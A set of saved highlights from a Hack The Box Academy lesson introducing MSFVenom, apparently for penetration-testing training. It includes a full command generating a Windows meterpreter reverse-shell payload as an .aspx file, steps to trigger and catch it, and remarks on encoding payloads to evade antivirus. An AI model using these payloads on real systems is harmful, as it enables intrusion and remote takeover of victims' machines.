Using the Metasploit Framework - Introduction to MSFVenom

#readwise # Using the Metasploit Framework - Introduction to MSFVenom ![rw-book-cover](https://readwise-assets.s3.amazonaws.com/static/images/article1.be68295a7e40.png) ## Metadata - Author: [[Hack The Box]] - Full Title: Using the Metasploit Framework - Introduction to MSFVenom - URL: https://academy.hackthebox.com/module/39/section/418 ## Summary MSFVenom combines two previous tools, MSFPayload and MSFEncode, to create customizable payloads for penetration testing. This tool allows users to generate payloads quickly while avoiding errors and evading antivirus systems. In the example, a reverse TCP connection can be established by uploading a PHP shell through an open FTP port. Finally, the Meterpreter shell can be used for further exploitation, leveraging the Local Exploit Suggester for privilege escalation. ## Highlights `MSFVenom` is the successor of `MSFPayload` and `MSFEncode`, two stand-alone scripts that used to work in conjunction with `msfconsole` to provide users with highly customizable and hard-to-detect payloads for their exploits. `MSFVenom` is the result of the marriage between these two tools. Before this tool, we had to pipe (`|`) the result from `MSFPayload`, which was used to generate shellcode for a specific processor architecture and OS release, into `MSFEncode`, which contained multiple encoding schemes used both for removing bad characters from shellcode (this could sometimes cause instability during the runtime), and for evading older Anti-Virus (`AV`) and endpoint Intrusion Prevention / Intrusion Detection (`IPS/IDS`) software. Nowadays, the two combined tools offer penetration testers a method to quickly craft payloads for different target host architectures and releases while having the possibility to 'clean up' their shellcode so that it does not run into any errors when deployed. ([View Highlight](https://read.readwise.io/read/01js91qkqpx3wf0z8ywa423761)) --- Generating Payload ```sh msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspx ``` ([View Highlight](https://read.readwise.io/read/01js91vfjev80ex1rh24z96sf4)) --- Now, we only need to navigate to `http://10.10.10.5/reverse_shell.aspx`, and it will trigger the `.aspx` payload. Before we do that, however, we should start a listener on `msfconsole` so that the reverse connection request gets caught inside it. ``` msf6 > use multi/handler ``` ([View Highlight](https://read.readwise.io/read/01js91w97fnnc267ssjn206gc2)) --- If the Meterpreter session dies too often, we can consider encoding it to avoid errors during runtime. We can pick any viable encoder, and it will ultimately improve our chances of success regardless. ([View Highlight](https://read.readwise.io/read/01js91xhrf0ehesp8cngy6d93p)) ---